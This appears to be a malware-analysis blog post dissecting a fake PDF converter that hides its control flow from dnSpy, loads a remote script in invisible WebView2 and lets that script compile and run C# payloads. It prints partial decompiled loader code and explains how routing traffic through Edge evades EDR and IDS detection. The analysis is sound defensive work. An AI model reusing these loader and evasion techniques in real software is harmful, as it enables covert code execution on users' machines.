Skip to main content

.NET in JavaScript, Fake PDF Converter

1. Overview

I found a site that distributes curious PDF converter. The executable file distributed at this site appears to be malicious and have several interesting features.
・ .NET Anti-Analysis
・ Execution of external JavaScript payload with WebView2
・ .NET object manipulation from JavaScript code

This post will mention these techniques. The execution flow of this executable is shown below.

2. .NET Anti-Analysis

PdfConverters.exe analyzed in this article was created with .NET Core. .NET Core allows developer to embed runtime and libraries into a single executable file. This executable also contains a number of files, which are extracted at execution time into a folder under %TEMP%\PdfConverters. A good way to know the role of these files is to look at [AppName].deps.json. app.deps.json reveals that main functionality of this executable exists in app.dll.

[app.deps.json]
...
      "app/1.0.0": {
        "dependencies": {
          "Microsoft.CodeAnalysis.CSharp": "3.4.0",
          "Microsoft.Management.Infrastructure": "2.0.0",
          "Microsoft.Web.WebView2": "1.0.1823.32",
          "NETStandard.Library": "2.0.3",
          "Newtonsoft.Json": "13.0.3",
          "runtimepack.Microsoft.NETCore.App.Runtime.win-x86": "3.1.32",
          "runtimepack.Microsoft.WindowsDesktop.App.Runtime.win-x86": "3.1.32"
        },
        "runtime": {
          "app.dll": {}
        }
      },
 ...

Analysis of app.dll with dnSpy showed that it does not have many methods. However, there was one method whose execution flow was obfuscated. InitializeAsync method is difficult to understand its execution flow, because <InitializeAsync>d__1 is not properly parsed.

When looking at unparsed objects, dnSpy's IL mode is useful. Then I found that MoveNext and SetStateMachine methods are implemented in <InitializeAsync>d__1. This is attacker's System.Runtime.CompilerServices.AsyncStateMachineAttribute interface.

AsyncVoidMethodBuilder.Start takes System.Runtime.CompilerServices.AsyncStateMachineAttribute interface as argument. However, attacker creates fake System.Runtime.CompilerServices.AsyncStateMachineAttribute interface and uses it as AsyncVoidMethodBuilder.Start's argument. This allows MoveNext method to be hidden from the dnSpy's compiled result and to be executed by AsyncVoidMethodBuilder.Start.

https://learn.microsoft.com/en-us/dotnet/api/system.runtime.compilerservices.asyncvoidmethodbuilder.start?view=net-7.0
https://learn.microsoft.com/en-us/dotnet/api/system.runtime.compilerservices.iasyncstatemachine?view=net-7.0

3. Execution of external JavaScript payload with WebView2

PdfConverters.exe uses WebView2 library for external communication. This is technology that allows NET applications to control Microsoft Edge.
https://learn.microsoft.com/en-us/microsoft-edge/webview2/

This executable is accessed to https://www.pdfconvertercompare[.]com/main using WebView2. Why does malware open external page with browser? The general idea is to show the user a decoy page. In fact, this URL distributes the legitimate application.
However, the control of Microsoft Edge by WebView2 was done in invisible mode. Therefore, it has other roles that are not decoys.

I have researched https://www.pdfconvertercompare[.]com/main and noticed main.js script. Although invisible mode, main.js is loaded and executed because it is accessed via Microsoft Edge.

It is probably well known that browser security makes it difficult to impact host OS through JavaScript. Therefore, these methods don't seem to make sense, which will be discussed in the next section.
But if this JavaScript execution is worthwhile, it makes Blue Team's detection difficult. Because external communication is not send by PdfConverters.exe, but by legitimate Microsoft Edge WebView2. This makes detection by EDR and creating IPS/IDS signature difficult.

4. .NET object manipulation from JavaScript code

WebView2 not only allows to control Microsoft Edge from .NET, but also to manipulate .NET objects from JavaScript executed in Microsoft Edge. This executable creates the object of api class and takes it as argument to AddHostObjectToScript method. AddHostObjectToScript method allows manipulation of the argument object from JavaScript.

https://learn.microsoft.com/en-us/microsoft-edge/webview2/how-to/hostobject?tabs=win32

main.js manipulates objects of api class to execute C# code. First, objects of api class can be accessed as chrome.webview.hostObjects.api in JavaScript. This JavaScript code executes LC method with C# code as argument. 
...
    try {
      x = chrome.webview.hostObjects.api
    } catch (G9) {}
...
    c = '\nusing System;\nusing System.Diagnostics;\n ...'  //C# Code
...
    v6 = x.LC
...
    var Gf = {
                a: j,
                s: J,
                c: vp,
                d: vL,
                r: vV,
              }
    var GS = JSON.stringify(Gf)
    await vz('8 - before load install search/show overlay assembly')
    var GC = await v6(GS, 'a', 's', 'c', 'd', 'r')  //Execute api.LC method
 ...

LC method of api class compiles and executes the given C# code. Each method name, namespace name and class name that takes this operation is given as argument from JavaScript and is not hard-coded into .NET code. 
public bool LC(string ja, string ank, string sk, string rck, string rdk, string rfk)
{
	JObject jobject = JObject.Parse(ja);
	string text = (string)jobject[ank]; 
	if (this.cad.ContainsKey(text))
	{
		return true;
	}
	string text2 = (string)jobject[sk]; //C# source code
    MemoryStream memoryStream = new MemoryStream();
...
    string path = (string)Type.GetType((string)jarray4[0]).GetMethod((string)jarray4[1][0][0]).Invoke(null, null); //System.Runtime.InteropServices.RuntimeEnvironment.GetRuntimeDirectory
...
    SyntaxTree syntaxTree = (SyntaxTree)type.GetMethod((string)jarray5[1][0][0], types).Invoke(null, array2); //Microsoft.CodeAnalysis.CSharp.SyntaxFactory.ParseSyntaxTree
...
    object obj = type2.GetMethod((string)jarray6[1][0][0], types).Invoke(null, array2); //Microsoft.CodeAnalysis.CSharp.CSharpCompilation.Create
...
	obj = method.Invoke(obj, new object[]  //Execute compiled C# code
	{
		obj2
	});
 ...

Using the described techniques, this executable runs C# payload.
PdfConverters.exe : 3DDFA37D2779149114BFDD3E56EFD6573426628639CC6D7E180AA8F15A85C5A2

Labels:

Comments

Post a Comment

Popular posts from this blog

Node.js Malware created by pkg project

1. Overview JavaScript is one of the most used programming languages, and Node.js is also used widely as execution environment. However, Node.js applications cannot be run without Node.js runime, so using them as malware requires a little effort. For this reason, pkg project that convert NodeJS applications to EXE file or other executable formats can be the attractive tool for attackers. This article describes tips for analyzing Node.js malware created by pkg project. 2. Sample Node Stealer SHA256: d6aee63ffe429ddb9340090bff2127efad340240954364f1c996a8da6b711374 3. pkg project pkg project packs js files and runtime into a single file. This executable file created is structured as follows. The custom runtime has the capability to execute js files stored in the virtual file system and downloaded from following repositories. Repositories URL : https://github.com/vercel/pkg-fetch The pkg project adds virtual files and index to the back of the runtime. Furthermore, the ru...
Post a Comment
Read more

Prefetch Internals note

1. Overview Prefetch is artifact that exists in Windows. This artifact records program execution files read by that program in 10 seconds. Prefetch is one of the most well-known artifacts, but its recording mechanism is very complex as follows. (This is an simplified version, not the whole thing.) I reversed the kernel to look for something interesting in the data related to prefetch. However, I could not find any incident response usable data. Now that I understand the mechanisms involved in prefetch, I leave this blog as a note. ・Same executable but different prefetch conditions ・High probability bypass prefetch 2. Same executable but different prefetch conditions Generally, prefetch is created for each executable file path. This is handled internally as the following NT kernel path. If the hashes of this path are the same, they are written to the same prefetch. \Device\HarddiskVolume2\Windows\System32\cmd.exe However, there are a few exceptions. You will see a l...
Post a Comment
Read more

Next Pdf Converter PUA

1. Overview This post describes a PUA similar to the sample mentioned in the following article. https://www.c2server.xyz/2023/09/net-in-javascript-fake-pdf-converter.html If you would like to know more about the previous sample, the following articles are excellent. Thanks to the article for following up on the deficiency of my previous post. https://www.themalwareanalyst.com/2023/11/fake-pdf-converter-leading-to-malicious.html https://security5magics.blogspot.com/2023/10/interesting-customloader-observed-in.html 2. Sample This sample can be downloaded from the following URL. https://www.free-pdf-convert[.]com/ The this sample operations are as follows. This sample also uses WebView2 like the previous sample. The single page app works as PDF converter as follows. In other words, this sample does not run WebView2 in hidden mode. How is this single page application implemented? The main implementation of this app can be found at https://pdf.activegn.com/js/app.[xxxx...
Post a Comment
Read more